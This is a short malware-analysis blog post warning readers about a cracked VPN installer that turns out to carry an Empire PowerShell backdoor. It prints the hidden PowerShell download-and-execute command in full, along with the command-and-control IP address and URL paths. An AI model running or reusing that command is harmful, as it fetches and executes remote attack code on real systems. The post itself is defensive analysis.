Malware research/reverse – Payload backdoor

Hello.
I have some free time and I try to do my part for internet safety. I’m just a small drop in the ocean, but I’m here!
Today I will introduce you to something different.
As usual, I downloaded a few pieces of software and started the analysis.
I have a "great offer":
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!!(just kidding)

We have 3 important files.
Setup.exe and Update.exe appear to be archived files, and from previous posts we know what this means, but today our target is the HSS v.2.exe file.


Note that it is the most recently created file.

Also, the installation procedure requires running this file.

OK. Let’s scan this time!

Virus Total Report

20/68 detections?!?
In other words, only 20 of the 68 antivirus engines flag this file as malicious.

[quote]OK. It’s normal for it to be flagged by antivirus. It’s just a crack, a patch, etc. You have to disable the antivirus to install it; it’s just pirated software.[/quote]

Let’s get started

It looks like this .exe is actually a .rar archive.

After opening it, a lot of work happens in the background.
We let it do its job so we can find out what it is doing!

When everything is quiet, we see that something is still left running.

[quote]powershell.exe -nop -windowstyle Hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1')"[/quote]

The malware runs through powershell.exe and connects to external sources:

[quote]h**ps://sgist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1raw9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1[/quote]

It also connects to:

[quote]
http://83.251.132.4
/admin/get.php
/login/process.php
/news.php
[/quote]

After investigation I found out that this is an Empire PowerShell payload project.

[quote]

Currently Empire PowerShell has the following categories for modules:

  • Code Execution – Ways to run more code
  • Collection – Post exploitation data collection
  • Credentials – Collect and use creds
  • Exfiltration – Identify egress channels
  • Lateral Movement – Move around the network
  • Management – Host management and auxiliary
  • Persistence – Survive reboots
  • Privesc – Privilege escalation capabilities
  • Recon – Test further entry points (HTTP Basic Auth etc)
  • Situational Awareness – Network awareness
  • Trollsploit – For the lulz
[/quote]

Prodefence.org

What can I say …. be careful!

Have fun & stay safe!!!

Alex Anghelus

SC Prodefence SRL CEO - Cyber Security, Pentesting & Ethical Hacking - Malware Analyst

2 thoughts on “Malware research/reverse – Payload backdoor”

  • 30/11/2017 at 12:04 PM

    Good job Alex! 😉

  • 30/11/2017 at 12:06 PM

    Nice share.
